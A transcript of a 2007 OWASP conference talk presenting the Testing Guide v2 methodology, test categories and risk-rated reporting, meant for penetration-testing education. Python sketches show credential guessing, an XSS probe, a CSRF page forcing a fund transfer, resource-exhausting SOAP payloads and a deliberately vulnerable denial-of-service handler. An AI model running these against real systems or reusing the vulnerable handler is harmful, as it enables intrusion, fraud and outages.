
Slide 1 – OWASP Testing Guide v2
Copyright © 2007 – The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit the Creative Commons website.
6th OWASP AppSec Conference, Milan – May 2007
Matteo Meucci – OWASP Testing Guide lead, OWASP Italy Chair

Slide 2 – Agenda
- The new Testing Guide: goals and deliverables
- The OWASP Testing Framework
- The Testing Methodology: how to test
- Reporting: how to evaluate the risk and write a report
- How the Guide will be useful to the web security industry
- Q&A

Slide 3 – Introduction: Matteo Meucci
- OWASP Testing Guide lead since 2007, thanks to the AoC!
- 6+ years in Information Security, focusing on Application Security
- OWASP Italy founder and Chair
- Consultant at BT Global Services

Slide 4 – OWASP Projects
[Diagram relating threat agents, attacks, vulnerabilities, countermeasures, assets, system impacts and business impacts to the OWASP projects: Testing Guide, Code Review Guide, Building Guide, Honeycomb, Tools]

Slide 5 – What Is the OWASP Testing Guide?
Free and open…
"It's impossible to underestimate the importance of having this guide available in a completely free and open way." – Jeff Williams (OWASP Chair)

Slide 6 – OWASP Testing Guide v2: Goals
- Review all the existing documentation on testing:
  - July 14, 2004 – "OWASP Web Application Penetration Checklist", Version 1.1
  - December 2004 – "The OWASP Testing Guide", Version 1.0
- Create a completely new project focused on Web Application Penetration Testing
- Create a reference for application testing and describe the OWASP methodology
- Our approach in writing this guide: open, collaborative, defined testing methodology, consistent, repeatable, high quality

Slide 7 – OWASP Testing Guide v2: Action Plan
Started in October 2006:
- Collect all the old documents
- Brainstorm the index and the template
- Involve major world experts in this field: David Endler, Giorgio Fedon, Javier Fernández-Sanguino, Glyn Geoghegan, Stan Guzik, Madhura Halasgikar, Eoin Keary, David Litchfield, Andrea Lombardini, Ralph M. Los, Claudio Merloni, Matteo Meucci, Marco Morana, Laura Nunez, Gunter Ollmann, Antonio Parata, Yiannis Pavlosoglou, Carlo Pelliccioni, Harinath Pudipeddi, Alberto Revelli, Mark Roxberry, Tom Ryan, Anush Shetty, Larry Shields, Dafydd Studdard, Andrew van der Stock, Ariel Waissbein, Jeff Williams, Vicente Aguilera, Mauro Bregolin, Tom Brennan, Gary Burns, Luca Carettoni, Dan Cornell, Mark Curphey, Daniel Cuthbert, Sebastien Deleersnyder, Stephen DeVries, Stefano Di Paola

Slide 8 – OWASP Testing Guide v2: Action Plan (2)
- November 2006: write the articles using our wiki model; review the articles
- December 2006: review the whole Guide; produce the Guide in doc format
- January 2007: OWASP Testing Guide Release Candidate 1 (272 pages, 48 tests); feedback and review
- February 2007: OWASP Testing Guide v2 officially released
The SANS Top 20 cites our guide in section "C1. Web Applications".
"Congratulations on version 2 of the OWASP Testing Guide! It is an impressive and informative document that will greatly benefit the software development community." – Joe Jarzombek, Deputy Director for Software Assurance, Department of Homeland Security

Slide 9 – Testing Guide v2: Index
1. Frontispiece
2. Introduction
3. The OWASP Testing Framework
4. Web Application Penetration Testing
5. Writing Reports: value the real risk
Appendix A: Testing Tools
Appendix B: Suggested Reading
Appendix C: Fuzz Vectors

Slide 10 – The OWASP Testing Framework in the SDLC
- Principles of testing: comparing the state of something against a defined and complete set of criteria
- We want security testing not to be a black art
- SDLC phases: Define, Design, Develop, Deploy, Maintain
The framework spans the whole lifecycle: before the SDLC, Define & Design, Development, Deploy & Maintenance.

Slide 11 – Testing Techniques
- Manual inspections and reviews: test to ensure that the appropriate policies and standards are in place for the development team
- Threat modeling:
  - Security requirements review
  - Design and architecture review: how the application works
  - Create and review threat models: develop realistic threat scenarios

Slide 12 – Testing Techniques (cont.)
- Code review:
  - Code walkthroughs (high level)
  - Code reviews (white-box testing): static code reviews validate the code against a set of checklists (CIA triad, OWASP Top 10, ...)
- Penetration testing:
  - The focus of this guide: black-box testing
  - The process involves an active analysis of the application for any weaknesses, technical flaws or vulnerabilities

Slide 13 – OWASP Framework: SDLC & OWASP Guidelines
[Diagram mapping the SDLC phases to the corresponding OWASP guidelines]

Slide 14 – Testing Paragraph Template
- Brief Summary: describe in "natural language" what we want to test. The target of this section is non-technical people (e.g. client executives)
- Description of the Issue: short description of the issue – topic and explanation
- Black Box testing and example: how to test for vulnerabilities; result expected: ...
- Gray Box testing and example: how to test for vulnerabilities; result expected: ...
- References: whitepapers, tools

Slide 15 – Black Box vs. Gray Box
- Black Box: the penetration tester does not have any information about the structure of the application, its components and internals
- Gray Box: the penetration tester has partial information about the application internals, e.g. the platform vendor or the session ID generation algorithm
- White-box testing, defined as complete knowledge of the application internals, is beyond the scope of the Testing Guide and is covered by the OWASP Code Review Project

Slide 16 – Testing Model
We have split the set of tests into 8 sub-categories (for a total of 48 controls):
- Information Gathering
- Business Logic Testing
- Authentication Testing
- Session Management Testing
- Data Validation Testing
- Denial of Service Testing
- Web Services Testing
- AJAX Testing
In the next slides we will look at a few examples of tests/attacks and at some real-world cases.

Slide 17 – Information Gathering
- The first phase of a security assessment is of course focused on collecting all available information about the target application
- Using publicly available tools it is possible to force the application to leak information by sending messages that reveal the versions and technologies it uses
- Available techniques include: raw HTTP connections (netcat); the good old tools (nmap, amap, ...); web spiders; search engines ("Google dorking"); SSL fingerprinting; file extension handling; backups and unreferenced files (a minimal banner-grabbing sketch follows)
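As an illustration of the raw-HTTP-connection technique mentioned above, here is a minimal banner-grabbing sketch in Python, roughly what one would do by hand with netcat. The target host is a placeholder; the script sends a HEAD request over a plain socket and prints the Server and X-Powered-By headers, which is exactly the kind of version leakage the slide refers to.

```python
import socket

def grab_banner(host: str, port: int = 80) -> str:
    """Send a raw HTTP HEAD request and return the full response header block."""
    request = (
        f"HEAD / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    )
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(request.encode("ascii"))
        response = b""
        while chunk := sock.recv(4096):
            response += chunk
    return response.decode("latin-1", errors="replace")

if __name__ == "__main__":
    headers = grab_banner("www.example.com")   # placeholder target
    for line in headers.splitlines():
        # Server and X-Powered-By commonly reveal the web server and framework versions
        if line.lower().startswith(("server:", "x-powered-by:")):
            print(line)
```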

Slide 18 – Business Logic Testing
In this phase we look for flaws in the application's business logic rather than in its technical implementation. Areas of testing include:
- Rules that express the business policy (such as channels, location, logistics, prices and products)
- Workflows, i.e. the ordered tasks of passing documents or data from one participant (a person or a software system) to another
One of the most common findings in this step is a flaw in the order of the actions a user has to follow: an attacker may be able to perform them in a different order to gain some sort of advantage. This step is the most difficult to perform with automated tools, as it requires the penetration tester to fully understand the business logic that is (or should be) implemented by the application.

Slide 19 – Business Logic Testing: a real-world example
FlawedPhone was soon targeted by a fraud attack:
- The attacker bought a new FlawedPhone SIM card
- The attacker immediately requested to transfer the SIM card to another mobile carrier, which credits €0.05 for each received SMS message
- When the SIM card was "transferred" to the new provider, the attacker started sending thousands of e-mails to her FlawedPhone account
- The attacker had a 6-8 hour window before the e-mail-to-SMS application had its list updated and stopped delivering messages
- By that time, the attacker had ~ € in the card, and proceeded to sell it on eBay
All FlawedPhone systems worked as expected, and there were no bugs in the application code. Still, the logic was flawed.

Slide 20 – Authentication Testing
Testing the authentication scheme means understanding how the application checks users' identities, and using that information to circumvent the mechanism and access the application without proper credentials.
Tests include the following areas (a small credential-guessing sketch follows):
- Default or guessable accounts
- Brute force
- Bypassing authentication
- Directory traversal / file include
- Vulnerable "remember password" and password reset
- Logout and browser cache management
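To make the "default or guessable accounts" and brute-force items concrete, here is a minimal sketch of a credential-guessing probe using the Python requests library. The login URL, form field names and the success heuristic are hypothetical placeholders, not something defined by the guide; a real engagement must also account for scope, account lockout and rate limiting.

```python
import requests

# Hypothetical target and form fields -- adjust to the application under test.
LOGIN_URL = "https://target.example/login"
COMMON_CREDENTIALS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("test", "test"),
]

def try_login(username: str, password: str) -> bool:
    """Return True if the response does not look like a failed login."""
    resp = requests.post(
        LOGIN_URL,
        data={"username": username, "password": password},
        allow_redirects=False,
        timeout=10,
    )
    # Heuristic: many applications redirect on success and re-render the
    # login form (HTTP 200 containing an error string) on failure.
    return resp.status_code in (301, 302) and "error" not in resp.text.lower()

for user, pwd in COMMON_CREDENTIALS:
    if try_login(user, pwd):
        print(f"[!] Possible default/guessable account: {user}:{pwd}")
```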

Slide 21 – Session Management Testing
Session management is a critical part of a security test, as every application has to deal with the fact that HTTP is by its nature a stateless protocol. Session management broadly covers all controls on a user from authentication to leaving the application.
Tests include the following areas (see the cookie-inspection sketch below):
- Analysis of the session management scheme
- Cookie and session token manipulation
- Exposed session variables
- Cross-Site Request Forgery
- HTTP exploiting
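As one small piece of the "analysis of the session management scheme" item, the sketch below inspects the cookies set by a hypothetical target and flags session cookies missing the Secure or HttpOnly attributes. Token randomness, expiry and invalidation on logout of course need deeper analysis than this.

```python
import requests

TARGET = "https://target.example/"          # hypothetical target

resp = requests.get(TARGET, timeout=10)
for cookie in resp.cookies:
    # HttpOnly is stored as a non-standard attribute on http.cookiejar cookies.
    http_only = cookie.has_nonstandard_attr("HttpOnly")
    print(f"cookie {cookie.name!r}:")
    print(f"  Secure   : {cookie.secure}")
    print(f"  HttpOnly : {http_only}")
    if not (cookie.secure and http_only):
        print("  [!] session cookie may be exposed to sniffing or script access")
```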

Slide 22 – Example: Cross-Site Request Forgery
Test whether it is possible to force a user to submit an undesirable command to an application he/she is currently logged into.
- Also known as "session riding"
- A rather old type of attack, whose impact has always been underestimated
- It relies on the fact that browsers automatically send the information used to identify a specific session
- Applications that allow a user to perform an action without requiring some unpredictable parameter are likely to be vulnerable... and that means a lot of applications!
- All it takes is to trick the victim into following a link (e.g. by visiting an attacker-controlled site) while he/she is logged into the application

Slide 23 – Example: Cross-Site Request Forgery (cont.)
- trade.com is an online trading company
- trade.com uses an "über-paranoid triple-factor"™ authentication scheme, but does not want to bother users with confirmations, since traders need to act fast!
- The tester finds that a simple GET request such as https://trade.com/transfer?eu=90000&to=1234 is enough to execute a transaction
- The attacker builds a "very evil HTML page" that embeds this URL: the image is not visible to the victim, but loading the page while logged into trade.com triggers the fund transfer (see the sketch below)
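A minimal sketch of what the attacker's page could look like, served here from a throwaway Python web server. The trade.com URL is the one from the slide; the port and page text are purely illustrative. Any victim who opens this page while authenticated to trade.com has the GET request issued by their own browser, with their session cookies attached.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# The forged request is hidden in an invisible image: the browser fetches it
# automatically and sends the victim's trade.com session cookie along with it.
EVIL_PAGE = b"""<html>
  <body>
    <h1>I am a very evil HTML page... visit me! :)</h1>
    <img src="https://trade.com/transfer?eu=90000&to=1234"
         width="0" height="0" border="0">
  </body>
</html>"""

class EvilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(EVIL_PAGE)

if __name__ == "__main__":
    # Illustrative port; in a real scenario this is an attacker-controlled site.
    HTTPServer(("0.0.0.0", 8080), EvilHandler).serve_forever()
```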

Slide 24 – Data Validation Testing
In this phase we test that all input is properly sanitized before being processed by the application, in order to prevent several classes of attacks:
- Cross-site scripting: test that the application filters JavaScript code that might be executed by the victim, e.g. in order to steal his/her cookies
- HTTP methods and XST: test that the remote web server does not allow the TRACE HTTP method
- SQL injection: test that the application properly filters SQL code embedded in user input
- Other attacks based on faulty input validation: LDAP/XML/SMTP/OS injection, buffer overflows
A simple reflected-XSS probe is sketched below.
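As an illustration of the simplest kind of data-validation check, here is a hedged sketch of a reflected-XSS probe: it injects a marker payload into a hypothetical query parameter and checks whether it comes back unencoded. Real testing needs many more payloads and injection contexts (see Appendix C, Fuzz Vectors).

```python
import requests

# Hypothetical target page and parameter name.
URL = "https://target.example/search"
PARAM = "q"

# A marker that is easy to spot if reflected without output encoding.
PAYLOAD = "<script>alert('xss-probe-1337')</script>"

resp = requests.get(URL, params={PARAM: PAYLOAD}, timeout=10)

if PAYLOAD in resp.text:
    print(f"[!] Parameter {PARAM!r} reflects the payload unencoded: likely XSS")
elif "xss-probe-1337" in resp.text:
    print(f"[?] Parameter {PARAM!r}: payload partially reflected; manual review needed")
else:
    print(f"[-] No reflection detected for parameter {PARAM!r}")
```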

Slide 25 – Denial of Service Testing
DoS vulnerabilities in applications allow a malicious user to make certain functionality, or sometimes the entire website, unavailable. These problems are caused by bugs in the application, often triggered by malicious or unexpected user input. This kind of testing is usually not performed in production environments.
Tests include (a deliberately vulnerable handler is sketched below):
- Locking customer accounts
- User-specified object allocation
- User input as a loop counter
- Writing user-provided data to disk
- Failure to release resources
- Storing too much data in session
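To show what "user-specified object allocation" and "user input as a loop counter" mean in practice, here is a deliberately vulnerable, entirely hypothetical request handler (it is not from the guide): the client-supplied rows parameter drives both memory allocation and loop iterations, so a single request with a huge value can tie up a worker and its memory.

```python
from flask import Flask, request   # hypothetical example app, not from the guide

app = Flask(__name__)

@app.route("/report")
def report():
    # VULNERABLE: 'rows' comes straight from the user and is used both as an
    # allocation size and as a loop counter -- a request with ?rows=100000000
    # exhausts memory and CPU (user-specified object allocation / loop counter).
    rows = int(request.args.get("rows", "10"))
    table = []
    for i in range(rows):
        table.append({"row": i, "padding": "x" * 1024})
    return {"rows": len(table)}

# A safer version would clamp the value, e.g. rows = min(rows, 1000).
```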

Slide 26 – Web Services Testing
- Web services suffer from vulnerabilities similar to the other "classical" vulnerabilities, such as SQL injection and information disclosure and leakage, but they also have unique XML/parser-related vulnerabilities.
- WebScarab (available for free at www.owasp.org) provides a plug-in specifically targeted at web services. It can be used to craft SOAP messages that contain malicious elements in order to test how the remote system validates input.

Slide 27 – Web Services Testing: XML Structural Testing
The slide shows a snippet of XML (its tags were lost in transcription; the visible strings are "OWASP", "EOIN" and "I am Malformed") that violates the hierarchical structure of the language, for example through unclosed or improperly nested elements. A web service must be able to handle this kind of exception in a secure way. A reconstruction of the idea is sketched below.
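Since the slide's XML was lost to tag stripping, here is a hedged reconstruction of the test: send a structurally invalid SOAP envelope (improperly nested and unclosed elements) to a hypothetical endpoint and observe whether the service fails safely with a clean SOAP fault or leaks a stack trace and other internals.

```python
import requests

ENDPOINT = "https://target.example/Service/Service.asmx"   # hypothetical endpoint

# Structurally broken XML: <flavor> is opened inside <id> but closed outside it,
# and <note> is never closed at all.
MALFORMED_SOAP = """<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <Order>
      <id>123<flavor></id>I am Malformed</flavor>
      <note>unclosed element
    </Order>
  </soap:Body>
</soap:Envelope>"""

resp = requests.post(
    ENDPOINT,
    data=MALFORMED_SOAP,
    headers={"Content-Type": "text/xml; charset=utf-8"},
    timeout=10,
)
print(resp.status_code)
# A secure service should return a controlled SOAP fault, not a stack trace
# or other internal details.
print(resp.text[:500])
```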

Slide 28 – Web Services Testing (cont.): XML Large Payload
Another possible attack consists of sending a very large payload to a web service in an XML message, e.g. elements containing "I am a Large String (1MB)" repeated over and over. Such a message might deplete the resources of a DOM parser. A generator for such a message is sketched below.
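A small sketch of how such an oversized message could be generated and sent; the element names and endpoint are hypothetical. DOM parsers load the whole document into memory before processing it, so tens of megabytes of repeated 1 MB strings can exhaust the server.

```python
import requests

ENDPOINT = "https://target.example/Service/Service.asmx"   # hypothetical endpoint

big_string = "A" * (1024 * 1024)          # roughly 1 MB of payload per element
repeated = "\n".join(
    f"<data>{big_string}</data>" for _ in range(20)   # ~20 MB in total
)

LARGE_SOAP = f"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <Upload>
      {repeated}
    </Upload>
  </soap:Body>
</soap:Envelope>"""

resp = requests.post(
    ENDPOINT,
    data=LARGE_SOAP.encode("utf-8"),
    headers={"Content-Type": "text/xml; charset=utf-8"},
    timeout=60,
)
# Watch server response time and memory usage: a DOM-based parser has to load
# the entire document before it can process it.
print(resp.status_code, len(resp.content))
```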

Slide 29 – Web Services Testing (cont.): Naughty SOAP Attachments
Binary files, including executables and document types that can contain malware, can be posted to a web service in several ways. The slide shows an example request:
POST /Service/Service.asmx HTTP/1.1
Host: somehost
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: ...
with a SOAP body that uploads an attachment named "eicar.pdf" of type "pdf" (the full XML body was lost in transcription).

Slide 30 – AJAX Testing
- AJAX (Asynchronous JavaScript and XML) is a web development technique used to create more interactive web applications
- It uses the XMLHttpRequest object and JavaScript to make asynchronous requests for all communication with the server-side application
- Main security issues:
  - AJAX applications have a greater attack surface, because a large share of the application logic is moved to the client side
  - AJAX programmers seldom keep an eye on what is executed by the client and what is executed by the server
  - Exposed internal functions of the application
  - Client access to third-party resources with no built-in security and encoding mechanisms
  - Failure to protect authentication information and sessions
  - AJAX bridging

Slide 31 – AJAX Testing (cont.)
- While in traditional web applications it is very easy to enumerate the points of interaction between clients and servers, things get a bit more complicated when testing AJAX pages, as server-side AJAX endpoints are not as easy or consistent to discover
- To enumerate endpoints, two approaches must be combined:
  - Look through the HTML and JavaScript (e.g. look for XMLHttpRequest objects) – see the sketch below
  - Use a proxy to monitor traffic
- Tools: OWASP Sprajax or the Firebug add-on for Firefox
- Then you can test each endpoint as described before (SQL injection, etc.)
- ... and don't forget AJAX's potential in prototype hijacking and resident XSS!
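A hedged sketch of the first approach: fetch a page, grep the inline and external JavaScript for XMLHttpRequest usage, and collect URL-looking strings that may be AJAX endpoints. The target URL and the regular expressions are illustrative heuristics; a proxy such as WebScarab still gives the authoritative picture of what is actually requested.

```python
import re
import requests

PAGE = "https://target.example/app/"        # hypothetical AJAX application page

html = requests.get(PAGE, timeout=10).text

# Collect the JavaScript: inline <script> bodies plus externally referenced files.
scripts = re.findall(r"<script[^>]*>(.*?)</script>", html, re.DOTALL | re.IGNORECASE)
for src in re.findall(r'<script[^>]+src=["\']([^"\']+)["\']', html, re.IGNORECASE):
    url = src if src.startswith("http") else PAGE.rstrip("/") + "/" + src.lstrip("/")
    scripts.append(requests.get(url, timeout=10).text)

endpoints = set()
for js in scripts:
    if "XMLHttpRequest" in js or ".open(" in js:
        # Very rough heuristic for endpoint-looking strings passed to xhr.open().
        endpoints.update(re.findall(r'["\'](/[\w/.\-]+(?:\?[^"\']*)?)["\']', js))

for ep in sorted(endpoints):
    print("possible AJAX endpoint:", ep)
```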

Slide 32 – AJAX Testing (cont.)
With Firebug it is possible to efficiently inspect AJAX applications. [Screenshot of Firebug inspecting an AJAX application]

Slide 33 – Testing Report: Model
- The OWASP Risk Rating Methodology: estimate the severity of each of these risks to your business
- This is not a universal risk rating system: a vulnerability that is critical to one organization may not be very important to another
- It is a simple approach, to be tailored to every case, based on the standard risk model: Risk = Likelihood * Impact
- Step 1 – Identifying a risk. You'll need to gather information about:
  - the vulnerability involved
  - the threat agent involved
  - the attack being used
  - the impact of a successful exploit on your business

Slide 34 – Testing Report: Likelihood
Step 2 – Factors for estimating likelihood. Generally, identifying whether the likelihood is low, medium, or high is sufficient.
Threat agent factors:
- Skill level (0-9)
- Motive (0-9)
- Opportunity (0-9)
- Size (0-9)
Vulnerability factors:
- Ease of discovery (0-9)
- Ease of exploit (0-9)
- Awareness (0-9)
- Intrusion detection (0-9)

Slide 35 – Testing Report: Impact
Step 3 – Factors for estimating impact.
Technical impact:
- Loss of confidentiality (0-9)
- Loss of integrity (0-9)
- Loss of availability (0-9)
- Loss of accountability (0-9)
Business impact:
- Financial damage (0-9)
- Reputation damage (0-9)
- Non-compliance (0-9)
- Privacy violation (0-9)

Slide 36 – Testing Report: Value the Risk
Step 4 – Determining the severity of the risk.
In the example above, the likelihood is MEDIUM and the technical impact is HIGH, so from a purely technical perspective the overall severity is HIGH. But the business impact is actually LOW, so the overall severity is best described as LOW as well. A small scoring sketch follows.
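A minimal sketch of how the 0-9 factors from the previous two slides can be combined, assuming the common OWASP convention of averaging the factors and bucketing the result (below 3 is low, below 6 is medium, otherwise high). The example figures and the final severity matrix are illustrative assumptions and should be tailored to the organization, as the slides stress.

```python
def level(score: float) -> str:
    """Map an average 0-9 score to a qualitative level."""
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"

def average(factors: dict) -> float:
    return sum(factors.values()) / len(factors)

# Example figures (hypothetical, chosen to match the slide's MEDIUM likelihood
# and LOW business impact).
likelihood_factors = {
    "skill_level": 5, "motive": 4, "opportunity": 6, "size": 5,        # threat agent
    "ease_of_discovery": 4, "ease_of_exploit": 5,
    "awareness": 4, "intrusion_detection": 3,                          # vulnerability
}
business_impact_factors = {
    "financial_damage": 2, "reputation_damage": 2,
    "non_compliance": 1, "privacy_violation": 2,
}

likelihood = level(average(likelihood_factors))
impact = level(average(business_impact_factors))

# Illustrative severity matrix: overall severity indexed by (likelihood, impact).
SEVERITY = {
    ("LOW", "LOW"): "LOW",     ("LOW", "MEDIUM"): "LOW",       ("LOW", "HIGH"): "MEDIUM",
    ("MEDIUM", "LOW"): "LOW",  ("MEDIUM", "MEDIUM"): "MEDIUM", ("MEDIUM", "HIGH"): "HIGH",
    ("HIGH", "LOW"): "MEDIUM", ("HIGH", "MEDIUM"): "HIGH",     ("HIGH", "HIGH"): "HIGH",
}

print(f"likelihood={likelihood}, business impact={impact}, "
      f"overall severity={SEVERITY[(likelihood, impact)]}")
```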

Slide 37 – Writing the Report
I. Executive Summary
II. Technical Management Overview
III. Assessment Findings
IV. Toolbox

Slide 38 – How the Guide will help the security industry
For pen-testers:
- A structured approach to the testing activities
- A checklist to be followed
- A learning and training tool
For clients:
- A tool to understand web vulnerabilities and their impact
- A way to check the quality of the penetration tests they buy
More generally, the Guide aims to provide a pen-testing standard that creates a 'common ground' between the pen-testing industry and its clients. This will raise the overall quality and understanding of this kind of activity and therefore the general level of security in our infrastructures.

Slide 39 – What's next
OWASP Testing Guide next steps:
- Continuously improve the Testing Guide: it's a live document!
- Start a new project: want to contribute to the new version?
- Improve client-side testing (see the next great talk by Stefano Di Paola)
- Translate it: the Guide has just been translated into Spanish, thanks to Daniel P.F.!
Thanks to Alberto Revelli for producing some of the slides we discussed at EuSecWest07.

Slide 40 – Thank you!

